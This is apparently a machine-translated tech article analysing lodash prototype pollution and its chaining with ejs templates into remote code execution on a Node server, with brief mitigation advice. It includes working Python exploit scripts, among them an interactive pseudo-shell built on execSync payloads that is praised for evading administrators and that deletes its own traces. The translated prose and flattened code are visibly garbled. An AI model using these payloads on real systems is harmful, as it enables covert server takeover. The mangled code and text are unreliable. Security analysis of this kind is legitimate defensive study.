Shulou(Shulou.com)06/03 Report--

The web front-end prototype chain contamination vulnerability can take the example analysis of the server shell. In view of this problem, this article introduces the corresponding analysis and solution in detail, hoping to help more partners who want to solve this problem to find a more simple and feasible method.

As a front-end developer, I accidentally encountered a prototype chain contamination loophole one day. I thought it had no impact. Driven by curiosity, I peeled off the cocoon and found that the prototype chain contamination loophole could also take down the shell management rights of the server.

Coding, who was struggling one day, the robot sent such a message.

Check and find that it is a vulnerability called "prototype chain contamination" (Prototype chain pollution). Fortunately, this is only a dev dependency, which has little impact under the current feature, and can be fixed by upgrading the version of the package.

The loophole of "prototype chain pollution" looks like a high-end name, which is comparable to "Internet slang". Driven by curiosity, I studied it with a bit of curiosity.

Currently, this vulnerability affects the common use of the framework:

Lodash {const prefixPayload = {nickname: "bytedanceer"}; / / for usage, please see https://lodash.com/docs/4.17.15#merge _ .merge (prefixPayload, payload); / / other problematic functions: merge defaultsDeep mergeWith} App.use (async (ctx) = > {/ / in a business scenario, merge the payload if submitted by the user (ctx.method = 'POST') {combine (ctx.request.body);} / / somewhere on a page const user = {username: "visitor",}; let welcomeText = "classmate, swimming and fitness, know?" ; / / because user.role does not exist, it is always false, where the code cannot execute if (user.role = = "admin") {welcomeText = "Dear VIP, here you are!" ;} ctx.body = welcomeText;}); app.listen (3001, () = > {console.log ("Running: http://localohost:3001");}))

When a tourist user visits the URL: http://127.0.0.1:3001/, the page will display "classmate, swimming and fitness, what do you know?"

You can see that the merge () function of loadsh (version 4.17.10) is used in the code to merge the user's payload and prefixPayload.

At first glance, there seems to be no problem, and there seems to be no problem with the business. No matter what users visit, they should only return "classmate, swimming and fitness, learn about it?" In this sentence, if user.role is a condition that is always undefined, the code in the if judgment body will never be executed.

However, use a special payload test, that is, to run our attack.py script

When we visit http://127.0.0.1:3001 again, we will find that the result returned is as follows:

Instantly become the VIP of the gym, right, you can have fun whoring? At this point, no matter what user visits this URL, the returned web page will display the result as above, everyone VIP era. If the code we wrote has this problem online, [accident report] check it out.

The code for attact.py is as follows:

Import requests import json req = requests.Session () target_url = 'http://127.0.0.1:3001' headers= {' Content-type': 'application/json'} # payload = {"_ proto__": {"role": "admin"} payload = {"constructor": {"prototype": {"role": "admin"}} res = req.post (target_url, data=json.dumps (payload), headers=headers) print (' attack complete!')

Payload: {"constructor": {"prototype": {"role": "admin"}} in the attack code implements merge assignment through the merge () function. At the same time, because payload adds a role attribute to the prototype object when constructor,merge is set, and the default value is admin, the accessed user becomes "VIP".

2.2 analyze the implementation of merge function in loadsh

The analysis of lodash version 4.17.10 (interested students can get the source code to trace it manually?) node_modules/lodash/merge.js locates to the baseMerge function on line 20 of node_modules/lodash/_baseMerge.js by calling the baseMerge (object, source, srcIndex) function.

Function baseMerge (object, source, srcIndex, customizer, stack) {if (object = source) {return;} baseFor (source, function (srcValue, key) {/ / if the merged attribute value is object if (isObject (srcValue)) {stack | (stack = new Stack); / / call baseMerge baseMergeDeep (object, source, key, srcIndex, baseMerge, customizer, stack) } else {var newValue = customizer? Customizer (safeGet (object, key), srcValue, (key +'), object, source, stack): undefined; if (newValue = undefined) {newValue = srcValue;} assignMergeValue (object, key, newValue);}, keysIn);}

Focus on the functions of safeGet:

Function safeGet (object, key) {return key = ='_ _ proto__'? Undefined: object [key];}

This is why the above payload does not use _ _ proto__ but uses a prototype equivalent to the constructor of this property

Payload is an object, so navigate to line 32 of node_modules/lodash/_baseMergeDeep.js:

Function baseMergeDeep (object, source, key, srcIndex, mergeFunc, customizer, stack) {var objValue = safeGet (object, key), srcValue = safeGet (source, key), stacked = stack.get (srcValue); if (stacked) {assignMergeValue (object, key, stacked); return;}

The positioning function assignMergeValue is on line 13 of node_modules/lodash/_assignMergeValue.js.

Function assignMergeValue (object, key, value) {if ((value! = = undefined & &! eq (object [key], value)) | (value = undefined & &! (key in object)) {baseAssignValue (object, key, value);}}

Reposition baseAssignValue on line 12 of node_modules/lodash/_baseAssignValue.js

Function baseAssignValue (object, key, value) {if (key = ='_ proto__' & & defineProperty) {defineProperty (object, key, {'configurable': true,' enumerable': true, 'value': value,' writable': true});} else {object [key] = value;}}

Bypassing the if judgment and then entering the else logic is a simple direct assignment operation that does not judge constructor and prototype, so there is:

PrefixPayload = {nickname: "bytedanceer"}; / / payload: {"constructor": {"prototype": {"role": "admin"}} _ .merge (prefixPayload, payload); / / then assign a property named role to the prototype object with a value of admin

As a result, users will enter an impossible logic, resulting in the above "ultra vires" problem.

2.3 loophole combination punch to win server permissions

From the Demo case above, you may have the illusion that prototype chain vulnerabilities don't seem to have much impact and do not require special attention (compared to sql injection, xss,csrf, etc.).

Is that true? Let's take a look at another example that has been slightly modified (adding the ejs rendering engine). Based on the prototype chain contamination vulnerability, let's take down the server's shell!

Const express = require ('express'); const bodyParser = require (' body-parser'); const lodash = require ('lodash'); const app = express (); app .use (bodyParser.urlencoded ({extended: true})) .use (bodyParser.json ()); app.set (' views','. / views'); app.set ('view engine',' ejs'); app.get ("/", (req, res) = > {let title = 'Hello to tourists' Const user = {}; if (user.role = = 'vip') {title =' VIP Hello';} res.render ('index', {title: title});}); app.post ("/", (req, res) = > {let data = {}; let input = req.body; lodash.merge (data, input); res.json ({message: "OK"});}) App.listen (8888, '0.0.0.0')

This example is based on express+ejs+lodash. Similarly, visiting localhost:8888 will only show hello to tourists. As above, you can use prototype chain attacks to make "Renren VIP", but not only this, but we can also make in-depth use, with the help of ejs rendering and lodash containing prototype chain contamination vulnerabilities, we can achieve RCE (Remote Code Excution, remote code execution)

Let's take a look at the attack effects we can achieve:

As you can see, with the help of attack.py scripts, we can execute arbitrary shell commands, and at the same time, we also ensure that other users will not be affected (administrators cannot easily perceive the intrusion). In the next situation, hackers will carry out common sense attacks such as rights promotion, authority maintenance, horizontal penetration and so on, in order to gain greater benefits, but at the same time, they will also bring greater losses to the enterprise.

The above attack method is based on the code injection formed by the combination of loadsh prototype chain contamination vulnerability and ejs template rendering, thus creating a more harmful RCE vulnerability.

Next, let's take a look at the causes of the loophole:

1. Break point debugging render method

two。 Enter the render method and pass the options and template name to app.render ()

3. Get the corresponding rendering engine ejs

4. Enter an exception handling

5. Go ahead

6. Render from a template fil

7. There is nothing that can be used to deal with caching.

8. Finally came to the place where the template was compiled.

9. Keep going.

10. Finally entered the ejs library.

In this file, it is found that the opts.outputFunctionName in line 578 is the value of a undefined, and if the attribute value exists, it is spliced into the variable prepended, followed by line 597, as part of the output source code

In line 697, put the spliced source code into the callback function, and then return the callback function

11. The callback function is called in tryHandleCache

Finally, the rendering output to the client is completed.

You can find that in step 10, the opts.outputFunctionName in line 578 is a value of undefined, and if we assign a js code through the object prototype chain, it will be spliced into the code (code injection), and the js code will be executed during template rendering.

In the nodejs environment, the callable system method code can be spliced into the rendering callback function and passed to the callback function as the function body, then remote arbitrary code execution can be achieved, that is, the effect demonstrated above, and users can execute any system command.

2.4 gracefully implement an attack script

The elegance is that administrators and other users can sneak down the server's shell without being aware of it.

The complete script for Exploit is as follows:

Import requests import json req = requests.Session () target_url = 'http://127.0.0.1:8888' headers = {' Content-type': 'application/json'} # invalid attack # payload = {"_ proto__": {"role": "vip"}} # ordinary logical attack payload = {"content": {"constructor": {"prototype": {"role": "vip"}} }} # RCE attack # payload = {"content": {"constructor": {"prototype": {"outputFunctionName": "a Return global.process.mainModule.constructor._load ('child_process') .execSync (' ls /'); / / "} # bounce shell, such as bounce to MSF/CS # simulate an interactive shell if _ _ name__ =" _ _ main__ ": payload ='\ {" content ":\ {" constructor ":\" prototype ":\ {" outputFunctionName ":" a Return global.process.mainModule.constructor._load (\ 'child_process\'). ExecSync (\'{}\'); / / "\} 'while (True): shell = input (' shell:') if shell = ='': continue if shell = = 'exit': break formatStr =" a Return global.process.mainModule.constructor._load ('child_process') .execSync (' "+ shell +"') / / "payload = {" content ": {" constructor ": {" prototype ": {" outputFunctionName ": formatStr} res = req.post (target_url, data=json.dumps (payload), headers=headers) res2 = req.get (target_url) print (res2.text) # processing traces formatStr =" a; return delete Object.prototype ['outputFunctionName'] / / "payload = {" content ": {" constructor ": {" prototype ": {" outputFunctionName ": formatStr} res = req.post (target_url, data=json.dumps (payload), headers=headers) req.get (target_url) 0x03 how to circumvent or fix vulnerabilities 3.1 scenarios where there may be vulnerabilities

Object cloning

Object merging

Path settin

3.2 how to avoid

First of all, the vulnerability of the prototype chain actually requires the attacker to obtain the source code for the project project or through some methods (such as file reading vulnerabilities). The research cost of the attack is high, and generally do not have to worry. However, attackers may use some scripts for batch black box testing, or with the help of some experience or rules, they can reduce the cost of research, so this problem can not be easily ignored.

Hongmeng official Strategic Cooperation to build HarmonyOS Technology Community

Timely upgrade package version: in the company's R & D system, security operators participate in the whole process and automatically trigger security detection during packaging and other operations, which actually reminds developers that there may be risky third-party packages. This requires everyone to upgrade the corresponding third-party package to the latest version in time, or try to replace a more secure package.

Keyword filtering: there may be scenarios combined with vulnerabilities, so you can pay more attention to code blocks such as object copying and merging, and whether filtering is done for _ _ proto__, constructor and prototype keywords.

Using hasOwnProperty to determine whether the attribute comes directly from the target, this method ignores the attributes inherited from the prototype chain.

Make a decision when dealing with json strings and filter sensitive key names.

Use Object.create (null) to create objects without prototypes.

Freeze the prototype of Object with Object.freeze (Object.prototype) so that the prototype of Object cannot be modified. Note that this method is a shallow freeze.

0x04 problem & exploring 4.1 more questions

Q: why not use _ _ proto__? in payload in the case of demo

A: in version 4.17.10 of the loadsh library I used, I found that the _ _ proto__ keyword was judged and filtered, so I thought of bypassing it by accessing the prototype of the constructor

Q: in Demo, why is it that any user's access is VIP after being attacked?

A:JavaAcript executes the program in a single thread, so the properties on the prototype chain are equivalent to global, which are shared by all connected users. When a user's operation changes the content on the prototype chain, then all visitors access the program based on the modified prototype chain.

4.2 Exploration

As a security researcher, the prototype chain vulnerabilities demonstrated above do not seem to pose a great threat, but in fact, hacker attacks are often a combination of vulnerabilities. When a minor vulnerability is used as the basis for the attack of a high-risk vulnerability, can a low-risk vulnerability still be considered a low-risk vulnerability? This requires security researchers not only to pursue the excavation of high-risk vulnerabilities, but also to enhance the awareness of exploring basic vulnerabilities.

As developers, we can try how to use tools to quickly detect whether there are prototype chain contamination vulnerabilities in the program, in order to enhance the security of enterprise programs. Fortunately, some security checks have been done within the company through the compilation platform, and you can pay more attention to security.

Although it is difficult to use prototype chain contamination, based on its characteristics, all open source libraries can be seen on npm. If a malicious hacker detects open source libraries in batches and collects features, it is not difficult for him to obtain whether the target program references a vulnerable open source library.

This is the answer to the example analysis question that the web front-end prototype chain contamination vulnerability can take down the server shell. I hope the above content can be of some help to you. If you still have a lot of doubts to be solved, you can follow the industry information channel for more related knowledge.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.